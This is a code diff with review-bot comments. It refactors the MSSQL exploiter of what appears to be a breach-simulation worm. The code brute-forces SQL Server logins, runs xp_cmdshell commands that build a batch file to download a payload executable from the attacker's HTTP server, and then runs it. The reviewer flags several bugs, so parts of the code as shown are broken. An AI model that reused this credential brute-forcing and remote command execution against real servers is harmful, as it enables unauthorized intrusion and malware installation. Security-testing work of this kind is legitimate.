diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py
index 9030433fd..693aaa8f4 100644
--- a/monkey/infection_monkey/exploit/mssqlexec.py
+++ b/monkey/infection_monkey/exploit/mssqlexec.py
@@ -1,13 +1,12 @@
 import os
 import logging
-
+from time import sleep
 import pymssql
 from infection_monkey.exploit import HostExploiter, mssqlexec_utils, tools
 from common.utils.exploit_enum import ExploitType
 from infection_monkey.exploit.tools import HTTPTools
 from infection_monkey.config import WormConfiguration
-from infection_monkey.model import RDP_CMDLINE_HTTP
 __author__ = 'Maor Rayzin'
@@ -55,14 +54,22 @@ class MSSQLExploiter(HostExploiter):
 if not self.create_payload_file(payload_path):
 return False
- if self.brute_force_begin(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, username_passwords_pairs_list,
- payload_path):
- LOG.debug("Bruteforce was a success on host: {0}".format(self.host.ip_addr))
- return True
- else:
+ cursor = self.brute_force(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, username_passwords_pairs_list)
+ if not cursor:
 LOG.error("Bruteforce process failed on host: {0}".format(self.host.ip_addr))
 return False
+ def execute_command(self, cursor, cmds):
+ try:
+ # Running the cmd on remote host
+ for cmd in cmds:
+ cursor.execute(cmd)
+ sleep(0.5)
+ except Exception as e:
+ LOG.error('Error sending the payload using xp_cmdshell to host', exc_info=True)
+ return False
+ return True
+
 def handle_payload(self, cursor, payload):
 """
 Handles the process of payload sending and execution, prepares the attack and details.
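Review bot: On a successful login this method now falls off the end and returns `None`: the removed branch returned `True`, and the cursor obtained from `brute_force` is never used, so the payload handling that `brute_force_begin` used to trigger (the `handle_payload` call removed in the hunk at -141) no longer happens anywhere and every caller sees a falsy result. The success path needs an explicit return, presumably `return self.handle_payload(cursor, payload_path)`, and if `brute_force` yields `None` when no pair works the guard is clearer as `if cursor is None:`, which does not depend on the driver's cursor object being truthy; what `brute_force` returns after its loop is outside the hunks shown. In the new `execute_command`, `except Exception as e` binds `e` and never uses it (`exc_info=True` already captures the traceback), so `except Exception:` is enough, and the handler is wider than its message suggests since any exception from `cursor.execute` is reported as a payload-send failure. The enclosing method starts before this hunk.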
@@ -93,15 +100,15 @@ class MSSQLExploiter(HostExploiter):
 # TODO choose bit version
 dst_path = WormConfiguration.dropper_target_path_win_64
 dst_path = "c:\\windows\\temp\\monkey64.exe"
-
- command = RDP_CMDLINE_HTTP % {'http_path': http_path, 'monkey_path': dst_path}
 LOG.info("Started http server on %s", http_path)
 tmp_file_path = "c:\\windows\\temp\\monkey_tmp.bat"
- commands = [r"xp_cmdshell 'echo powershell (new-object System.Net.WebClient).DownloadFile(\" > %s'" % tmp_file_path]
- commands2 = [r"xp_cmdshell 'echo powershell >> c:\\windows\\temp\\temp.bat'"]
+ commands = ["xp_cmdshell \"%s\"" % tmp_file_path,
+ "xp_cmdshell \">%s\"" % (http_path, tmp_file_path),
+ "xp_cmdshell \">%s\"" % (dst_path, tmp_file_path)]
+ chosen_attack.execute_command(commands)
+ commands2 = ["exec xp_cmdshell \"%s\"" % tmp_file_path]
 chosen_attack.execute_command(commands2)
-
 if chosen_attack.send_payload():
 LOG.debug('Payload: {0} has been successfully sent to host'.format(payload))
 if chosen_attack.execute_payload():
@@ -116,7 +123,7 @@ class MSSQLExploiter(HostExploiter):
 chosen_attack.cleanup_files()
 return False
- def brute_force_begin(self, host, port, users_passwords_pairs_list, payload):
+ def brute_force(self, host, port, users_passwords_pairs_list):
 """
 Starts the brute force connection attempts and if needed then init the payload process. Main loop starts here.
@@ -124,7 +131,6 @@ class MSSQLExploiter(HostExploiter):
 Args:
 host (str): Host ip address
 port (str): Tcp port that the host listens to
- payload (str): Local path to the payload
 users_passwords_pairs_list (list): a list of users and passwords pairs to bruteforce with
 Return:
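Review bot: `chosen_attack.execute_command(commands)` and the existing `chosen_attack.execute_command(commands2)` call still resolve to `CmdShellAttack.execute_command`, which this same commit deletes from mssqlexec_utils.py (hunk at -108); the replacement was added as `MSSQLExploiter.execute_command(self, cursor, cmds)`, so if `chosen_attack` is a `CmdShellAttack` both calls now raise `AttributeError`. They should become `self.execute_command(cursor, commands)` and `self.execute_command(cursor, commands2)`, and their boolean results should be checked rather than discarded, since the code currently proceeds to `send_payload()` after a failure that was only logged. As rendered here, the second and third `commands` entries carry a single `%s` against a two-element tuple, which would raise `TypeError` at runtime; this may be a rendering loss, so verify it against the real source. `handle_payload` begins and ends outside this hunk.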
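Review bot: The docstring kept under the renamed `brute_force` still says it will "if needed then init the payload process", but the payload handling was removed from its loop (hunk at -141) and the function now returns the cursor of the first successful login. The summary line should be rewritten along the lines of `Tries each user/password pair against host:port and returns a cursor for the first connection that succeeds.`, and the `Return:` section below this hunk (not shown) presumably still describes the old True/False result and needs the same correction.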
@@ -141,15 +147,7 @@ class MSSQLExploiter(HostExploiter):
 'using user: {1}, password: {2}'.format(host, user, password))
 self.report_login_attempt(True, user, password)
 cursor = conn.cursor()
-
- # Handles the payload and return True or False
- if self.handle_payload(cursor, payload):
- LOG.debug("Successfully sent and executed payload: {0} on host: {1}".format(payload, host))
- return True
- else:
- LOG.warning("user: {0} and password: {1}, " "was able to connect to host: {2} but couldn't handle payload: {3}" .format(user, password, host, payload))
+ return cursor
 except pymssql.OperationalError:
 # Combo didn't work, hopping to the next one
 pass
diff --git a/monkey/infection_monkey/exploit/mssqlexec_utils.py b/monkey/infection_monkey/exploit/mssqlexec_utils.py
index c45b53eeb..e9f7d616e 100644
--- a/monkey/infection_monkey/exploit/mssqlexec_utils.py
+++ b/monkey/infection_monkey/exploit/mssqlexec_utils.py
@@ -108,28 +108,8 @@ class CmdShellAttack(AttackHost):
 self.attacker_ip = get_interface_to_target(host.ip_addr)
 self.host = host
- def execute_command(self, cmds):
- ftp_server, ftp_server_p = self.__init_ftp_server(self.host)
- if ftp_server_p and ftp_server:
- #command = "xp_cmdshell \""+cmd+"\""
- #command = "xp_cmdshell \"C:\\download.bat\""
- #command = "EXEC xp_cmdshell \"c:\\download.bat\""
- try:
- # Running the cmd on remote host
- for cmd in cmds:
- self.cursor.execute(cmd)
- sleep(0.5)
- except Exception as e:
- LOG.error('Error sending the payload using xp_cmdshell to host', exc_info=True)
- self.ftp_server_p.terminate()
- return False
- return True
- else:
- LOG.error("Couldn't establish an FTP server for the dropout")
- return False
-
 def send_payload(self):
 """
 Sets up an FTP server and using it to download the payload to the remote host
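Review bot: `return cursor` hands the caller a cursor but drops the `conn` it was created from, and nothing in this diff closes that connection afterwards (the caller in the hunk at -55 returns right after its `if not cursor:` check), so the authenticated session stays open for as long as the objects live. Either keep a reference to the connection where it can be closed deterministically, e.g. `self.conn = conn` before `return cursor` with a matching `close()` in the caller's cleanup, or state in the docstring that the caller owns the connection's lifetime. Separately, the context line just above still writes the working username and password to the log at debug level; logging only the username would keep cleartext credentials out of the log file. The function's tail (what is returned when every pair fails) and its head are outside this hunk.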